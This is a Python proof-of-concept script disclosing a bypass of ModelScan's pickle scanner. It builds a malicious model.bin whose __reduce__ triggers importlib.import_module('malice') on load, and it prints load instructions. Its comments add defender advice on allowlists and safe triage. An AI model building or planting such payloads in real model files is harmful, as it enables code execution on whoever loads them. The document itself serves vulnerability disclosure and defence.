| #!/usr/bin/env python3 | |
"""
ModelScan PickleUnsafeOpScan Bypass — importlib.import_module RCE
=================================================================
Vulnerability: ModelScan's PickleUnsafeOpScan only checks unsafe_globals
against a hardcoded blacklist, and 'importlib' is NOT in that blacklist.
This allows an arbitrary Python module import, and therefore code execution,
via pickle's __reduce__ mechanism without ModelScan detection.
"""
| import pickle | |
| import importlib | |
class ImportlibRCE:
    """Pickle payload whose unpickling performs a module import.

    The pickle protocol calls the callable returned by ``__reduce__`` with
    the accompanying argument tuple at load time, so loading an instance of
    this class runs ``importlib.import_module('malice')`` in the loading
    process; anything ``malice`` does at import time runs there.

    Notes for defenders reviewing this bypass:
    - The gap is structural, not a missing entry: a denylist of known
      dangerous globals cannot enumerate every import or execution path.
      A scanner should flag GLOBAL/STACK_GLOBAL references that resolve to
      anything outside an explicit allowlist, rather than only names on a
      denylist.
    - On the consuming side, do not call ``pickle.load`` on untrusted model
      files directly; use a ``pickle.Unpickler`` subclass whose
      ``find_class`` raises for any module/name not in a strict allowlist,
      or a serialization format that carries no executable content.
    - ``pickletools.dis`` lists the referenced global (here
      ``importlib.import_module``) without executing the file, which is the
      safe way to triage a suspicious pickle.
    """

    def __reduce__(self):
        # importlib.import_module is NOT in ModelScan's unsafe_globals
        # When victim loads this pickle, it imports 'malice' module
        # which executes arbitrary code at module level
        return (importlib.import_module, ('malice',))
if __name__ == '__main__':
    # Save malicious pickle
    # NOTE(review): pickle.dump only records a reference to
    # importlib.import_module plus its argument; nothing in this block
    # imports or runs 'malice'. The import happens in whatever process later
    # calls pickle.load on model.bin, so scanning must occur before any load
    # and loaders should restrict find_class instead of trusting a
    # denylist-based file scan.
    with open('model.bin', 'wb') as f:
        pickle.dump(ImportlibRCE(), f)
    print("[+] Malicious pickle saved to model.bin")
    print("[+] Load with: pickle.load(open('model.bin', 'rb'))")
    print("[+] Make sure malice.py is in Python path")